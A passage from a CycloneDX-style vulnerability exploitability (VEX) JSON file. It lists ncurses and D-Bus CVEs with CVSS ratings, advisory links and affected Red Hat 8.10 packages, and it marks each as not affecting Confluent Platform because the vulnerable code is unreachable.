          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-19190",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in _nc_find_entry in tinfo/comp_hash.c:70 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19190"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19190"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc6.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19190"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19190"
        }
      ],
      "published": "2023-08-22T19:16:01+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-35512",
      "ratings": [
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.2,
          "severity": "high",
          "method": "CVSSv2",
          "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A use-after-free flaw was found in D-Bus Development branch <= 1.13.16, dbus-1.12.x stable branch <= 1.12.18, and dbus-1.10.x and older branches <= 1.10.30 when a system has multiple usernames sharing the same UID. When a set of policy rules references these usernames, D-Bus may free some memory in the heap, which is still used by data structures necessary for the other usernames sharing the UID, possibly leading to a crash or other undefined behaviors",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-35512"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35512"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-35512"
        },
        {
          "url": "https://bugs.gentoo.org/755392"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1909101"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket/security/advisories/GHSA-m7gr-wq6g-x327"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/commit/2b7948ef907669e844b52c4fa2268d6e3162a70c%20%28dbus-1.13.18%29"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/commit/dc94fe3d31adf72259adc31f343537151a6c0bdd%20%28dbus-1.10.32%29"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/commit/f3b2574f0c9faa32a59efec905921f7ef4438a60%20%28dbus-1.12.20%29"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/issues/305"
        },
        {
          "url": "https://gitlab.freedesktop.org/dbus/dbus/-/issues/305#note_829128"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35512"
        },
        {
          "url": "https://security-tracker.debian.org/tracker/CVE-2020-35512"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5244-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5244-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-35512"
        }
      ],
      "published": "2021-02-15T17:15:12+00:00",
      "updated": "2026-06-17T03:13:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.12.8-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/dbus-daemon@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/dbus-libs@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/dbus-tools@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/dbus@1.12.8-28.el8_10?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/dbus-common@1.12.8-28.el8_10?arch=noarch&distro=redhat-8.10&epoch=1"
        },
        {
